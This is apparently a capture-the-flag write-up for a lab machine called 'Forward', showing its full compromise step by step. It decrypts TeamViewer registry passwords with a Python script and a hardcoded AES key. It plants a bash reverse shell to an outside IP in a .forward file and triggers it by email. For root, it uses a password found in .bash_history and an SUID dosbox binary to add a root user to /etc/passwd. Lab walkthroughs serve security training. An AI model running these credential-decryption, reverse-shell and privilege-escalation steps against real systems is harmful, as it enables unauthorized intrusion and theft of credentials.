Forward
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 3000 -Pn 192.168.157.157
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-14 13:51 +08
Nmap scan report for 192.168.157.157
Host is up (0.17s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
139/tcp open netbios-ssn
445/tcp open microsoft-dWe might need to exploit SMTP to 'forward' messages.
SMB Shares -> Teamviewer Creds
There's one share readable with NULL credentials.
$ smbmap -H 192.168.157.157
[+] IP: 192.168.157.157:445 Name: 192.168.157.157
Disk Permissions Comment
---- ----------- -------
utils READ ONLY Utilities
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (Samba 4.9.5-Debian)Within it, there were some files present:
$ smbclient -N //192.168.157.157/utils
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Dec 18 16:26:48 2020
.. D 0 Fri Dec 18 15:48:44 2020
fox.reg N 10634 Fri Dec 18 15:48:44 2020
TeamViewer_Setup_v7.exe N 5024832 Fri Dec 18 15:48:44 2020
mara.reg N 10408 Fri Dec 18 15:48:44 2020
vale.reg N 10206 Fri Dec 18 15:48:44 2020
golemitratigunda.reg N 10206 Fri Dec 18 15:48:44 2020
alberobello.reg N 10206 Fri Dec 18 15:48:44 2020
giammy.reg N 10312 Fri Dec 18 15:48:44 2020
README.all N 165 Fri Dec 18 15:53:55 2020We can download all of these files to our machine.
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *We can first view the README.all:
$ cat README.all
each of you has to install TeamViewer and then import your own registry key for automatic configuration.
Don't worry about the password, it's well encrypted!
Root!TeamViewer credentials can actually be decrypted.
We can use parts of the script above to decrypt our files:
import sys, hexdump, binascii
from Crypto.Cipher import AES
class AESCipher:
def __init__(self, key):
self.key = key
def decrypt(self, iv, data):
self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
return self.cipher.decrypt(data)
key = binascii.unhexlify("0602000000a400005253413100040000")
iv = binascii.unhexlify("0100010067244F436E6762F25EA8D704")
hex_str_cipher = "1afa05622365454bf8b43255ac75ac87a60b9ad7ecc3ca9c2f856496cb8881ce" # output from the registry
ciphertext = binascii.unhexlify(hex_str_cipher)
raw_un = AESCipher(key).decrypt(iv, ciphertext)
print(hexdump.hexdump(raw_un))
password = raw_un.decode('utf-16')
print(password)Each of the .reg files have this hex string within it:
"SecurityPasswordAES"=hex:b2,21,47,c7,58,c4,f3,9a,6d,bc,84,44,f2,45,58,c2,cf,\
b5,44,a5,3b,94,74,a0,a2,d0,ea,21,b1,e1,3c,09We can decrypt each password and test it with both ssh and SMB. I extracted each of the passowrds like this:
$ echo '2c,0f,ff,76,ca,03,d7,c2,1c,0d,3c,8b,55,ed,d8,de,37,\
f8,97,20,ae,6e,d3,82,d0,ad,2e,70,f9,7e,ff,ea,0b,0c,1c,d9,01,cb,d1,ad,90,fc,\
60,1b,9e,40,fc,9c,4b,af,65,ee,c5,19,62,eb,4e,da,cc,7c,30,a8,a6,6b,0c,bd,9f,\
36,2a,c0,ca,d1,59,89,04,ae,cb,8b,96,10' | tr -d ',' | tr -d '\\' | tr -d '\n' | tr -d ' '
2c0fff76ca03d7c21c0d3c8b55edd8de37f89720ae6ed382d0ad2e70f97effea0b0c1cd901cbd1ad90fc601b9e40fc9c4baf65eec51962eb4edacc7c30a8a66b0cbd9f362ac0cad1598904aecb8b9610Then, decrypted them using the script:
$ python3 decrypt.py
00000000: 69 00 70 00 61 00 72 00 61 00 6C 00 69 00 70 00 i.p.a.r.a.l.i.p.
00000010: 6F 00 6D 00 65 00 6E 00 69 00 64 00 65 00 6C 00 o.m.e.n.i.d.e.l.
00000020: 6C 00 61 00 62 00 61 00 74 00 72 00 61 00 63 00 l.a.b.a.t.r.a.c.
00000030: 6F 00 6D 00 69 00 6F 00 6D 00 61 00 63 00 68 00 o.m.i.o.m.a.c.h.
00000040: 69 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 i.a.............
None
iparalipomenidellabatracomiomachiaThe password above is for the user fox, and using those credentials grants us access to another SMB Share.
$ smbmap -H 192.168.157.157 -u fox -p iparalipomenidellabatracomiomachia
[+] IP: 192.168.157.157:445 Name: 192.168.157.157
Disk Permissions Comment
---- ----------- -------
utils READ ONLY Utilities
print$ READ ONLY Printer Drivers
IPC$ NO ACCESS IPC Service (Samba 4.9.5-Debian)
fox READ, WRITE Home DirectoriesNew Shares -> Forward Shell
This print$ share has some interesting stuff:
$ smbclient -U fox //192.168.157.157/print$
Password for [WORKGROUP\fox]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jan 9 02:03:48 2021
.. D 0 Tue Jul 4 04:18:20 2023
W32X86 D 0 Sat Jan 9 02:03:48 2021
IA64 D 0 Mon Sep 2 21:39:42 2019
x64 D 0 Sat Jan 9 02:03:48 2021
COLOR D 0 Mon Sep 2 21:39:42 2019
W32PPC D 0 Mon Sep 2 21:39:42 2019
WIN40 D 0 Mon Sep 2 21:39:42 2019
W32MIPS D 0 Mon Sep 2 21:39:42 2019
W32ALPHA D 0 Mon Sep 2 21:39:42 2019
color D 0 Sat Jan 9 02:03:48 2021But I couldn't make sense of any of those. Let's check the fox share next:
$ smbclient -U fox //192.168.157.157/fox
Password for [WORKGROUP\fox]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jul 14 14:11:46 2023
.. D 0 Sat Jan 9 02:04:11 2021
.bashrc H 3526 Fri Dec 18 15:48:44 2020
.Xauthority H 53 Tue Aug 10 05:55:45 2021
.bash_history H 0 Tue Jul 4 04:15:25 2023
.profile H 807 Fri Dec 18 15:48:44 2020
local.txt N 33 Fri Jul 14 13:51:10 2023
.local DH 0 Tue Aug 24 18:20:56 2021
.dosbox DH 0 Tue Aug 10 05:55:54 2021
.bash_logout H 220 Fri Dec 18 15:48:44 2020
.gnupg DH 0 Tue Aug 10 05:40:39 2021
.forward AH 25 Tue Aug 24 18:23:05 2021There's an interesting folder called .forward present.
$ cat .forward
| /usr/bin/procmail -f-I read more about this file here:
Whenever the user receives mail, this output of the mail is piped to this binary. Since we have write access over the fox share, we can replace this with our own reverse shell.
| bash -c 'bash -i >& /dev/tcp/192.168.45.227/80 0>&1'Then, replace the .forward file in the share and send fox@localhost an email via swaks:
$ swaks --to fox@localhost --from test@localhost --header "Subject:Password Reset" --body "yo" --server 192.168.157.157This would give us a reverse shell:
Privilege Escalation
X11 Research + Fox Creds
Earlier I saw a .dosbox file within the fox share, so I checked whether it was an SUID binary:
fox@forward:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/dosboxTo exploit this, we need some form of GUI but RDP and VNC are both not available on this machine. Googling for 'SSH Dosbox Forwarding' brought up this Reddit post referring to x11:
Reading the manual for ssh reveals the -X flag is for x11 forwarding:
-X Enables X11 forwarding. This can also be specified on a
per-host basis in a configuration file.
X11 forwarding should be enabled with caution. Users with
the ability to bypass file permissions on the remote host
(for the user's X authorization database) can access the
local X11 display through the forwarded connection. An
attacker may then be able to perform activities such as
keystroke monitoring.
For this reason, X11 forwarding is subjected to X11
SECURITY extension restrictions by default. Refer to the
ssh -Y option and the ForwardX11Trusted directive in
ssh_config(5) for more informationIn short, this allows us to spawn the GUI needed to exploit this. Dropping our SSH key doesn't work, so we need to find creds for fox.
The /home directory had some other users, and one had a .bash_history folder:
fox@forward:/home$ ls
alberobello fox giammy golemitratigunda mara vale
fox@forward:/home$ ls -la *
<TRUNCATED>
mara:
total 12
drwxr-xr-x 2 root root 4096 Dec 18 2020 .
drwxr-xr-x 8 root root 4096 Jan 8 2021 ..
-rw-r--r-- 1 root root 64 Dec 18 2020 .bash_history
fox@forward:/home/mara$ cat .bash_history
sshh mara@192.168.0.191
CIARLARIELLOkj99
ssh mara@192.168.0.191This password works for fox.
Dosbox SUID -> Root
We can use the -X option after finding the user's password:
I tested by running dosbox, which spawns the GUI for me:
We can then run this:
dosbox -c 'mount c /' -c "type c:$LFILE"This would mount the Linux file system within the C Drive of the termnal:
To exploit this, first create a new hash:
$ openssl passwd -1 hello123
$1$rM9ydZhO$eC.2jbrxk2jETm6W64L/i1Then, run these commands on a fox SSH session:
cp /etc/passwd easy
echo 'hacker:$1$rM9ydZhO$eC.2jbrxk2jETm6W64L/i1:0:0::/root:/bin.sh' >> easyThen, on the dosbox instance, run this:
type C:/home/fox/easy >> C:/etc/passwdWe can then ssh in using the new hacker user:
Last updated